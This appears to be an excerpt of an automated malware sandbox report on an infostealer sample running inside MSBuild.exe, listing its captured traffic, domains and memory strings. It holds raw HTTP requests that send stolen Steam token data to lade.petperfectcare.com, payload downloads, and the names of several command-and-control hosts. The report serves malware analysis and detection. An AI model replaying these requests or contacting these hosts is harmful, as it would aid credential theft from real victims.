2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 55 32 39 6d 64 46 78 54 64 47 56 68 62 56 78 7a 64 47 56 68 62 56 39 30 62 32 74 6c 62 6e 4d 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 47 49 4a 44 48 44 47 44 42 47 44 47 43 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4e 4f 6d 77 41 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 47 49 4a 44 48 44 47 44 42 47 44 47 43 47 43 46 48 2d 2d 0d 0a Data Ascii: ------EHCGIJDHDGDBGDGCGCFHContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------EHCGIJDHDGDBGDGCGCFHContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------EHCGIJDHDGDBGDGCGCFHContent-Disposition: form-data; name="file_name"U29mdFxTdGVhbVxzdGVhbV90b2tlbnMudHh0------EHCGIJDHDGDBGDGCGCFHContent-Disposition: form-data; name="file_data"NOmwAg==------EHCGIJDHDGDBGDGCGCFH--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHIJJKEGHJJKECBKECFHost: lade.petperfectcare.comContent-Length: 130769Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFIEBKKJJDAKFHIDBFHHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 2d 2d 0d 0a Data Ascii: ------CAFIEBKKJJDAKFHIDBFHContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------CAFIEBKKJJDAKFHIDBFHContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------CAFIEBKKJJDAKFHIDBFHContent-Disposition: form-data; name="mode"5------CAFIEBKKJJDAKFHIDBFH--
Source: global traffic	HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1Host: nsdm.cumpar-auto-orice-tip.roCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHIHost: lade.petperfectcare.comContent-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 32 38 34 32 30 35 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 2d 2d 0d 0a Data Ascii: ------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="mode"51------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="task_id"1284205------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="status"1------BGIJDGCAEBFIIECAKFHI--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAEHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 36 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 2d 2d 0d 0a Data Ascii: ------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="mode"6------EGIDAAFIEHIEHJKFHCAE--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHIDGCAFCBAAAAAFHDAHost: cowod.hopto.orgContent-Length: 5757Connection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 95.164.90.97 95.164.90.97

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: VAKPoltavaUkraineUA VAKPoltavaUkraineUA

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:51636 -> 147.45.44.104:80

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: wickedneatr.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=vmF.kaNqUEmI1.qePWdiTp6vBz.dmeIQmRcdUjlLAWk-1728319428-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: wickedneatr.sbs

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

3_2_00406963

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sql.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1Host: nsdm.cumpar-auto-orice-tip.roCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: lade.petperfectcare.com
Source: global traffic	DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: nsdm.cumpar-auto-orice-tip.ro
Source: global traffic	DNS traffic detected: DNS query: exemplarou.sbs
Source: global traffic	DNS traffic detected: DNS query: frizzettei.sbs
Source: global traffic	DNS traffic detected: DNS query: isoplethui.sbs
Source: global traffic	DNS traffic detected: DNS query: bemuzzeki.sbs
Source: global traffic	DNS traffic detected: DNS query: exilepolsiy.sbs
Source: global traffic	DNS traffic detected: DNS query: laddyirekyi.sbs
Source: global traffic	DNS traffic detected: DNS query: invinjurhey.sbs
Source: global traffic	DNS traffic detected: DNS query: wickedneatr.sbs
Source: global traffic	DNS traffic detected: DNS query: cowod.hopto.org

Source: unknown

Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.EBFIIECAKFHI
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.CAKFHI
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/S
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orgCFH
Source: f1r6P3j3g7.exe, 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orga535a6c5ent-Disposition:
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orgare.com:80
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hoptoECAKFHI
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/freebl3.dll
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/freebl3.dllg
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/mozglue.dll
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/mozglue.dllC
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/msvcp140.dll
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/msvcp140.dll2
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/nss3.dll
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/nss3.dllZ_
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/softokn3.dllO
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/softokn3.dllb
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/sql.dll
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lade.petperfectcare.com/vcruntime140.dll
